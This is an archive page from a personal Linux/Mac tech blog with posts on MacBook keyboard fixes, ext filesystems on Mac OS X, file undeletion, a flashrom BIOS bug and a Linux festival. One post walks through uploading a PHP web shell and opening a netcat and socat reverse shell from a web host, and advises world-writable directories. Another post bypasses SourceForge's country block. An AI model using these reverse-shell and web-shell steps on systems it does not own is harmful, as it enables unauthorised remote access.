Archive for the ‘Believe Me’ Category

Keyboard function keys behave differently on operating systems other than Mac OS X. Soon after you install Ubuntu on your MacBook, you’ll notice several problems, from the default function-key behavior (which requires holding the Fn key) to an extremely slow touchpad. Most of these issues and their solutions are described on the Ubuntu MacBook wiki page, but recent kernels have changed things, so the parameters described around the net no longer fix the issue. The old way of fixing the keyboard was to add an option to the Human Interface Device (HID) kernel module to switch the function-key mode. For example, you might add the following contents to /etc/modprobe.d/functions.conf :

options hid pb_fnmode=2

Replace hid with usbhid for kernels older than 2.6.20. But neither of them worked on my Ubuntu 10.04 Lucid running a 2.6.32 kernel. In recent kernels, Apple HIDs have a separate kernel module named hid-apple, and the parameter has been renamed to fnmode. Knowing these changes, I tried setting the fnmode parameter via modprobe just as before, but failed. So to fix the keyboard issue I used the /sys interface to change the fnmode parameter of the hid_apple module:

root@Seeb:/home/ali# echo 2 > /sys/module/hid_apple/parameters/fnmode

Put this in your startup script /etc/rc.local, before the exit command, so that the issue gets fixed automatically on each boot. If you don’t know how to edit the file with root privileges, that’s easy! Press Alt+F2 and type the following command in the Run dialog:
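As a sketch, the edited /etc/rc.local would look roughly like this (the surrounding lines are the stock Ubuntu template; only the echo line is the actual fix):

```shell
#!/bin/sh -e
#
# rc.local - executed at the end of each multiuser runlevel.

# Make F1..F12 act as plain function keys by default (Fn reverses them):
echo 2 > /sys/module/hid_apple/parameters/fnmode

exit 0
```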

gksudo gedit /etc/rc.local

For the touchpad speed issue, all you need to do is install the gsynaptics package (qsynaptics for KDE users), open Touchpad Preferences from System > Preferences > Touchpad, and increase the newly shown “Min Speed” and “Max Speed” parameters:

Sometimes you purchase a web host and the only thing you get to control it with is an FTP account. For those familiar with Unix-like shells, it would be really cool to have an SSH session on the account, but most web hosts don’t offer that option. A shell makes maintaining files and permissions much easier.

The first step is to find out whether your PHP service bans the functions that execute a process. I’m talking about the exec, system and popen function families. You can write your own test or install a PHP script called “PHP Shell”. PHP Shell receives shell commands through the web browser, executes them, and finally delivers the output right in the browser window. There are lots of PHP shells out there; I used this one, developed by Martin Geisler. Download one of them and upload it using your FTP account.

For simple operations, you can get an interactive shell using GNU netcat (note the GNU part: there are lots of other versions, and most of them do not support executing commands). Running the following command on your machine creates a simple TCP listener on a specific port:

netcat -l -p 8999 -v

As you see, we have provided the verbose option to get notified when someone connects to the listener. Then, by running the following line on the web host, we can simply connect from the PHP shell to our local listener and receive a shell:

netcat my.pc.ip.address 8999 -e "/bin/bash -i"

The above netcat command will connect to your PC at home and execute an interactive bash shell. At this stage you can type a command and see its output (I call it semi-interactive). But you’ll soon notice that special terminal keys such as Ctrl+D, Ctrl+C and the arrow keys don’t work as expected.

We’ll use socat to overcome this problem. socat can connect almost any two streams you can find: files to sockets, terminals to UDP connections, process output to TCP connections — and it supports SSL connections too. But it is not installed on most distributions by default, so the first step is to get the source and compile it. We need it both on our local PC and on the web server. The PC part is easy, but for the web server you should first find out whether the build tools (compiler, make, etc.) are installed. Test this simply by running g++ and make in your PHP shell. If they are, you’re all set; follow these steps to get it running:

run wget http://www.dest-unreach.org/socat/download/socat-1.7.1.3.tar.gz

extract the file using tar -xf socat-1.7.1.3.tar.gz

cd socat-1.7.1.3

./configure

make

If everything went smoothly, you will have the socat binary right under the socat-1.7.1.3 folder. Note that if your web host doesn’t have the build tools installed, you should compile the package locally and upload the binary file. The final part is to set up the listener, this time using socat, and connect to it from the web host. Run the following commands:
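A common pair of socat commands that matches this setup — one listener on your PC bridging a TCP socket to your current TTY, and one on the web host wiring bash to that listener — looks like this. The port and address placeholders follow the earlier netcat example; treat the exact flags as a sketch, not necessarily what was originally posted:

```shell
# On your PC: bridge a listening TCP socket to your current terminal,
# in raw mode so control keys and arrows pass through untouched.
socat file:"$(tty)",raw,echo=0 tcp-listen:8999

# On the web host (run via the PHP shell): attach bash to a pseudo-TTY
# and connect it back to your listener.
socat exec:'/bin/bash -li',pty,stderr,setsid,sigint,sane tcp:my.pc.ip.address:8999
```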

The first socat command connects a TCP socket (still listening) to your current TTY, and the second one connects the bash process to your TCP listener. Now you have a fully functional TTY terminal connected to your account on the web host. Almost all terminal commands work, and you can run vim, nano, screen and Midnight Commander 😎 . There are a few differences between an SSH session and this reverse shell. The most important ones are:

Your session is not encrypted; you may use the SSL capabilities of socat.

SSH automatically forwards some useful shell variables; you may set them yourself or put them in the .bash_profile or .bashrc of the web hosting account, such as export TERM="xterm-color"

For simplicity, you may put the second socat command line in a new PHP script, to avoid using the PHP shell each time. Note that you should either secure your PHP shell or delete it when everything is finished, so that others can’t access your account.

Some web servers run under a different user ID than your account, which means you won’t have permission to create and edit files from the PHP shell. In such situations, creating a world-writable directory (enable all permissions for everyone) does the job.
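For example, from the reverse shell (or over FTP, if your client can set permissions), a scratch directory the web-server user can write to might be created like this; “shared” is just an arbitrary name for this sketch:

```shell
# The web server often runs as a different user (e.g. www-data or nobody),
# so give it a directory that anyone can write into.
mkdir -p shared
chmod 0777 shared
ls -ld shared    # permissions should now read drwxrwxrwx
```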

“The US government on Monday announced new rules making it officially legal for iPhone owners to ‘jailbreak’ their device and run unauthorized third-party applications, as well as the ability to unlock any cell phone for use on multiple carriers.”

The EFF has further details on this and some of the other legal protections granted in the new rules.

Userspace filesystem drivers are becoming more and more popular, since they’re portable and suffer fewer of the headaches of platform-specific filesystem drivers. For example, the NTFS-3G project provides full read/write support for NTFS under Linux and Mac OS X while living in userspace.

I recently discovered an open-source project called “fuse-ext2”, an implementation of an Ext2/Ext3/Ext4 filesystem driver in userspace. Before this one, there was only an ext2-only native kernel extension (kext) implementation, so I had no write access to my Ext3 partitions and no read access to Ext4 at all.

To use it and enable experimental write support for your Ext2 partition, follow these steps:

Download and install the NTFS-3G package, which includes the FUSE libraries.
AFAIK NTFS-3G has been renamed to Tuxera NTFS and is shareware now, but you can still download the old GPL version here. It works on both Leopard and Snow Leopard.
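Once FUSE and fuse-ext2 are installed, mounting with the experimental write support typically looks like this. The device node /dev/disk0s3 and the mount point are assumptions for illustration; find your actual Linux partition first:

```shell
# Identify the Linux partition, e.g.:
#   diskutil list
# Then mount it; the "rw+" option enables fuse-ext2's experimental writes.
mkdir -p /Volumes/Linux
sudo fuse-ext2 /dev/disk0s3 /Volumes/Linux -o rw+
```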

The new ‘Ultimate Movie Buff’ iPhone app is coming your way! Many loved the original and asked for more questions and categories, and here it is. We have teamed up with ITN to bring the ‘Ultimate Movie Buff’ iPhone app to you, complete with videos and almost 5,000 questions.

Play, challenge and boast on Facebook and Twitter. Don’t forget to submit scores to our global high score, so we can see who is the official Global Movie Buff!

SourceForge, the huge open-source software repository, recently banned some countries from downloading free and open-source software from its servers. However, there’s a quick trick with which you can download files directly from SourceForge mirrors, bypassing that IP address check.

Click on the file you want to download inside the “Files” section, and when the following page appears, press the ESC key to stop it from loading.

Now right-click on “direct link”, copy the link address and paste it into your address bar. It should look like this:

I just pressed the Enter key on a file-delete confirmation dialog and removed the code I had been working on for 3 hours. In fact I had made such a mistake before and had found nothing searching for “Ext3 Recovery / Ext4 Recovery …”. But this time a new project named extundelete appeared, which claims to extract file metadata from the filesystem’s journal.

I tried to extract and compile it by just typing “make” and found that the ext2fs library was missing, so I installed the ext2fs-dev package using the following command (I’m using Ubuntu 9.10):

sudo apt-get install ext2fs-dev

Then typing “make” in the src folder gives you a binary named “extundelete”. You can run it like this:

ali@Velocity:~/tmp/extundelete-0.1.8/src$ ./extundelete
No action specified; implying --superblock.
Usage: ./extundelete [options] [--] device-file
Options:
--version, -[vV] Print version and exit successfully.
--help, Print this help and exit successfully.
--superblock Print contents of superblock in addition to the rest.
If no action is specified then this option is implied.
--journal Show content of journal.
--after dtime Only process entries deleted on or after 'dtime'.
--before dtime Only process entries deleted before 'dtime'.
Actions:
--inode ino Show info on inode 'ino'.
--block blk Show info on block 'blk'.
--restore-inode ino Restore the file(s) with known inode number 'ino'.
The restored files are created in ./RESTORED_FILES
with their inode number as extension (ie, inode.12345).
--restore-file 'path' Will restore file 'path'. 'path' is relative to root of
the partition and does not start with a '/'
(it must be one of the paths returned by --dump-names).
The restored file is created in the current directory
as 'RECOVERED_FILES/path'.
--restore-files 'path' Will restore files which are listed in the file 'path'.
Each filename should be in the same format as
an option to --restore-file, and there should be one per line.
--restore-all Attempts to restore everything.
-j journal Reads an external journal from the named file.
-b blocknumber Uses the backup superblock at blocknumber when
opening the file system.
-B blocksize Uses blocksize as the block size when opening fs.
The number should be the number of bytes.

It seems that running the program with --restore-all should restore all recoverable files, like this:

ali@Velocity$ ./extundelete /dev/sda6 --restore-all

But that option only gave me some temporary, hidden and useless config files scattered over my home folder. I was thinking of rewriting the code …

Suddenly I found that extundelete supports another option in which you specify the inode number of your file, and it will bring it back … 🙂

Looking at the manual of the “ls” command, you’ll find that running “ls” with the -i parameter gives you the inode numbers of the files in a directory. I tried to find a range of inode numbers around the deleted file and search through all files in that range …
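As a sketch of that search, the snippet below takes the smallest inode number among the surviving neighbours of the deleted file and prints an extundelete invocation for each inode in a range after it. The device /dev/sda6, the directory and the range width of 50 are assumptions for illustration; it only prints the commands (a dry run), so you can review them before piping the output to sh:

```shell
#!/bin/sh
# dir: the directory that contained the deleted file (default: current dir)
dir=${1:-.}
# ls -i prints "inode name" pairs; take the numerically smallest inode.
ref=$(ls -i "$dir" | sort -n | awk 'NR==1 {print $1}')
# Print a restore command for each candidate inode in the range.
for ino in $(seq "$ref" $((ref + 50))); do
    echo ./extundelete /dev/sda6 --restore-inode "$ino"
done
```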

The fact that I always try to use open-source software makes me find new programs and try them, to see whether they can solve my problems and do the job or not. Some time ago, I had tried the flashrom project to see if it could update my BIOS chip, and the answer was NO! Your chipset is not supported yet!

Later on, around May 2009, I found a program which could change the boot logo of Phoenix BIOS images, and I recalled flashrom. Interestingly, this time it said “Yeah, your chip is now supported! :)”. I used it to read my BIOS image, and the result was a real, valid Phoenix image which I could modify. After making a new image, running flashrom to write it finished without any warnings or errors. I read the image back again and boom! It was neither the original BIOS nor the new one.

This is exactly when my first email went up on the community’s mailing list, and I knew that any careless act that ended in rebooting the laptop was going to kill it:

I tried the latest svn version (6 May 09) of flashrom and, unlike older versions, didn’t get a warning about my chipset. flashrom reads my chip successfully and outputs a fine Phoenix BIOS. After writing a new image into the chip,

I found that the writer is not fully functional: reading the chip again results in an image that is neither the original one nor the new image. Then I tried the erase functionality, and it resulted in some 0xFF and some unchanged bytes in the chip. Currently, writing either image doesn’t change the chip, and it remains mostly 0xFF bytes.

Most open-source project maintainers use IRC as their collaboration and communication channel, both among themselves and with the community. I went online; Peter, one of the maintainers, was there, but he wasn’t the person responsible for the ICH7 series chipsets, so I had to wait for Carl to come online. It was midnight in Iran, and I went to bed leaving the laptop up and running. The next morning I found Carl, and after working with him to pin down the problem, he suggested trying the AAI type of chip programming. It was a time-consuming task and I had to leave for an important session, so I left home.

When I returned, AAI had produced no good results. The wonderful part of the story is that my little sister had played with my laptop while I was out, and didn’t power it off so that I wouldn’t notice she had touched it without permission. 😀

Carl reviewed the datasheets for my BIOS chip and found that it doesn’t support writing multiple bytes at a time. Finally he sent me some patches, and the last one wrote the image successfully. I worked a few more hours to finalize the patch and sent some verification emails so that Carl could commit it to the main tree (and got acknowledgements for helping to track down the bug! 😉 ).

It was an amazing experience of active community support, and I should really thank Carl-Daniel Hailfinger, Peter Stuge and all the other active maintainers of open-source projects.

The second Linux Festival has been successfully held at Amirkabir University of Technology (a.k.a. Polytechnic). It was divided into three levels: Beginner, Intermediate and Advanced. The topics were presented in the computer site of the CEIT department, at a much better quality compared to last year’s festival. People installed, tasted and utilized a new operating system in a well-organized way. During the installation process and most of the other presentations, our local server and mirror of software packages (a.k.a. SSCLinuxBox) helped a lot and became the standard way of sharing files and installing software during the festival.

Topics and Schedule

One month ago, when we were planning the festival topics and schedule, Amir-Mohammad and I reviewed many Linux-related books and their contents. This resulted in a rich outline for the festival topics. Looking at the topics and the presentation quality, this was the first, and best, festival in Iran covering such a scope of topics. Here’s a summary of the main subjects and presentations:

Although this was our university’s second Linux Festival, and we fixed almost all the problems seen in the first one, there are always new problems to learn from. One of the main points I noticed in the first few presentations was the importance of coordination between presenters on the topics and the level of detail to be presented. The lack of such coordination before the festival caused problems in the presentation contents, since some presenters had a different idea of the listeners’ level and prepared extra material for beginners. In addition, none of us knew the dependencies of the subject about to be presented, or whether they had already been covered.

Yet another point on the art of presentation and teaching: in situations like this, where every presenter is a professional in a field, likes the topic and has chosen to teach it, hiding the unnecessary details is a very, very hard task. A teacher should be able to put themselves in the listeners’ place, simulate their thinking process, and remove the details that might break it. On the other hand, they should analyze the dependencies of the current topic and explain them before anything else.

I got a lot of feedback on the presentation style and found that estimating the listeners’ level and correctly decomposing the subject into its simplest form are the keys to a successful presentation.

Memories

It was a cool and friendly atmosphere. The support team and the technical team were both working hard to reach the best quality, and that made it a real memory. It’s notable that this was the first serious project of our new Scientific Committee, and the results were incredible.